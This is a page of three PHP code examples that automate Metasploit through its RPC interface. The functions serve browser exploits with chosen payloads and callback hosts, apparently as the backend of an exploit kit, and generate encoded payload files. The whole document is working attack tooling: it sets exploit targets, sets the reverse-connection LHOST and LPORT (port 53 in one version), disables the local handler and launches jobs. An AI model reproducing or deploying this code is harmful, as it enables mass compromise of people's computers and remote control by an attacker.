Exemplo n.º 1
0
function use_exploit($msgrpc_ip, $exploit_domain, $exploit_port, $msf_exploit_full_path, $msf_target, $msf_payload_full_path, $msf_cmd_option, $msf_uripath, $msf_ssl = 0)
{
    debug("START Function use_exploit()");
    debug("msgrpc_ip: " . $msgrpc_ip);
    debug("exploit_domain: " . $exploit_domain);
    debug("exploit_port: " . $exploit_port);
    debug("msf_exploit_full_path: " . $msf_exploit_full_path);
    debug("msf_target: " . $msf_target);
    debug("msf_payload_full_path: " . $msf_payload_full_path);
    debug("msf_cmd_option: " . $msf_cmd_option);
    // WL_DOMAIN
    // EXPLOIT_DOMAIN
    // MSGRPC_IP
    $token = msf_auth($msgrpc_ip);
    $client_request = array("core.version", $token);
    $server_response = msf_cmd($msgrpc_ip, $client_request);
    $client_request = array("console.create", $token);
    $server_response = msf_cmd($msgrpc_ip, $client_request);
    $console_id_one = $server_response["id"];
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "use " . $msf_exploit_full_path);
    //debug_r("server_response: " . $server_response);
    $msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1);
    debug("msf_exploit_name: " . $msf_exploit_name);
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set URIPATH /" . $msf_uripath);
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set SRVPORT 80");
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SRVPORT " . $exploit_port);
    if ($msf_ssl) {
        $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SSL true");
    } else {
        $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SSL false");
    }
    if ($msf_target >= 0) {
        $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set TARGET " . $msf_target);
    }
    // TODO: maybe remove when going live?
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set Retries true");
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set PAYLOAD " . $msf_payload_full_path);
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, $msf_cmd_option);
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set DisablePayloadHandler true");
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $cb_ip);
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT " . $cb_port);
    // // // $server_response = msf_console($ek_ip, $token, $console_id_one, "set InitialAutoRunScript migrate -f");
    //$server_response = msf_console($ek_ip, $token, $console_id_one, "set InitialAutoRunScript run post/windows/manage/migrate");
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "exploit -j");
    // use -j not -j -z
    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "show options");
    if ($msf_ssl) {
        #$msf_url = 'https://' . $exploit_domain . '/' . $msf_exploit_name;
        $msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
    } else {
        #$msf_url = 'http://' . $exploit_domain . '/' . $msf_exploit_name;
        $msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
    }
    debug("msf_url: " . $msf_url);
    debug("END Function use_exploit()");
    return $msf_url;
}
Exemplo n.º 2
0
function use_payload($ek_ip, $ek_un, $ek_pw, $msf_payload, $msf_type, $msf_rhost, $msf_rport, $msf_lhost, $msf_lport, $msf_encoder, $file_name)
{
    $token = msf_auth($ek_ip, $ek_un, $ek_pw);
    $client_request = array("core.version", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    $client_request = array("console.create", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    $console_id_one = $server_response["id"];
    $server_response = msf_console($ek_ip, $token, $console_id_one, "use " . $msf_payload);
    //debug("msf_payload: " . $msf_payload . "</BR>");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $msf_lhost);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set RHOST " . $msf_rhost);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set RPORT " . $msf_rport);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT " . $msf_lport);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set EXITFUNC thread");
    if ($msf_type == "raw") {
        $tmp_file = "/tmp/" . (string) time();
        $generated_payload = "generate -t " . $msf_type . " -f " . $tmp_file . " -b \\x00 -e " . $msf_encoder;
        //print $generated_payload;
        $server_response = msf_console($ek_ip, $token, $console_id_one, $generated_payload);
        sleep(1);
        $server_response = msf_console($ek_ip, $token, $console_id_one, "cat " . $tmp_file . " | base64 -w 0 > " . $file_name);
        sleep(1);
        $server_response = msf_console($ek_ip, $token, $console_id_one, "rm " . $tmp_file);
    } else {
        $server_response = msf_console($ek_ip, $token, $console_id_one, "generate -t " . $msf_type . " -f " . $file_name . " -b \\x00 -e " . $msf_encoder);
    }
    $fs = filesize($file_name);
    if ($fs == 0) {
        return false;
    } else {
        return true;
    }
    //return $server_response;
}
Exemplo n.º 3
0
function use_exploit($ek_ip, $cb_ip, $msf_exploit_full_path, $msf_payload_full_path, $msf_target = -1)
{
    debug("START Function use_exploit()</br>");
    $token = msf_auth($ek_ip);
    $client_request = array("core.version", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    $client_request = array("console.create", $token);
    $server_response = msf_cmd($ek_ip, $client_request);
    $console_id_one = $server_response["id"];
    $server_response = msf_console($ek_ip, $token, $console_id_one, "use " . $msf_exploit_full_path);
    $msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1);
    debug("msf_exploit_name: " . $msf_exploit_name . "</BR>");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set URIPATH /" . $msf_exploit_name);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set SRVPORT 80");
    if ($msf_target >= 0) {
        $server_response = msf_console($ek_ip, $token, $console_id_one, "set TARGET " . $msf_target);
    }
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set PAYLOAD " . $msf_payload_full_path);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LHOST " . $cb_ip);
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set LPORT 53");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "set DisablePayloadHandler true");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "exploit -j");
    $server_response = msf_console($ek_ip, $token, $console_id_one, "show options");
    $msf_url = 'http://' . $ek_ip . '/' . $msf_exploit_name;
    debug("END Function use_exploit()</br>");
    return $msf_url;
}